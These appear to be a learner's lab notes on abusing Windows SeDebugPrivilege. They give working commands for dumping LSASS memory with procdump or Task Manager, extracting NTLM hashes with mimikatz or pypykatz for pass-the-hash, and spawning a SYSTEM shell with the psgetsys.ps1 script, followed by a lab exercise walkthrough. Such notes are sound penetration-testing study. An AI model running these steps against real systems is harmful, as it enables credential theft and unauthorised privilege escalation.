# Intro - To run a particular application or service or assist with troubleshooting, a user might be assigned the [SeDebugPrivilege](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/debug-programs) instead of adding the account into the administrators group - This privilege can be assigned via local or domain group policy, under `Computer Settings > Windows Settings > Security Settings` -  By default, only admins are granted this privilege as it can be used to capture sensitive information from system memory, or access/modify kernel and application structures - This right may be assigned to devs who need to debug new system components as part of their day-to-day job - However, this user right should be given out sparingly # Abusing SeDebug ## ProcDump & Mimikatz - First, use [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) from  [SysInternals](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) to leverage this priv and dump process memory - A good candidate is the [LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service) process, which stores user creds after a user logs on to a system ```cmd C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp ``` - Now load `lsass.dmp` into `mimikatz` using `sekurlsa::minidump`, then use `sekurlsa::logonPasswords` to gain the NTLM hash of the local admin account logged on locally - We can then PtH to move laterally ```cmd C:\htb> mimikatz.exe -q mimikatz # log mimikatz # privelege::debug mimikatz # sekurlsa::minidump lsass.dmp mimikatz # sekurlsa::logonpasswords ``` - Note: Always a good idea to type `log` and `privelege::debug` before running any commands in `mimikatz` this way all command output will put output to a ".txt" file ## GUI LSASS Dump & pypkatz - Assume we are unable to load tools onto the Windows target but we have RDP access - In this case, we can take a manual memory dump of the `LSASS` process via the Task Manager by browsing to the `Details` tab, choosing the `LSASS` process, and selecting `Create dump file` ![[images/Pasted image 20260218202050.png]] - After moving this file back to Kali, we can process it locally with `pypykatz` # RCE as SYSTEM - Alternatively, we can leverage the `SeDebug` priv for [RCE](https://decoder.cloud/2018/02/02/getting-system/) - Using this technique, we can elevate our privs to SYSTEM by launching a [child process](https://docs.microsoft.com/en-us/windows/win32/procthread/child-processes) and using the elevated rights granted to our account via `SeDebug` to alter normal system behavior to inherit the token of a [parent process](https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads) and impersonate it - To this end, if we target a parent process running as SYSTEM (specifying the Process ID (or PID) of the target process or running program), then we can elevate our rights quickly - First, transfer this [PoC script](https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1) over to the target system - Then, open an elevated PowerShell session ```powershell tasklist ``` - From the above command, we know that we can target `winlogon.exe` running under PID 612 because it always runs as SYSTEM - Next, run the script by filling in the PID for `winlogon.exe` and the command to run ```powershell .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"") .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(612,"c:\windows\system32\cmd.exe","") ``` - Alternatively, use the [Get-Process](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.2) cmdlet to grab the PID of a well-known process that runs as SYSTEM (such as LSASS) and pass the PID directly to the script ```powershell .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process :lsass).Id,"c:\windows\system32\cmd.exe","") ``` --- # Exercise - `ping` test ![[images/Pasted image 20260218203245.png]] - same machine as last section so no `nmap` scan needed - `rdp` into target with given creds - light enum on target ![[images/Pasted image 20260218203446.png]] - we have `mimikatz` and `procdump` - downgrade to a `cmd` shell, then execute `procdump` to create `lsass.dmp` ```cmd procdump.exe -accepteula -ma lsass.exe \users\jordan\desktop\lsass.dmp ``` ![[images/Pasted image 20260218203735.png]] - execute `mimikatz`, then run setup commands ![[images/Pasted image 20260218203842.png]] - import `lsass.dmp`, then run `sekurlsa::logonPasswords` ![[images/Pasted image 20260218204007.png]]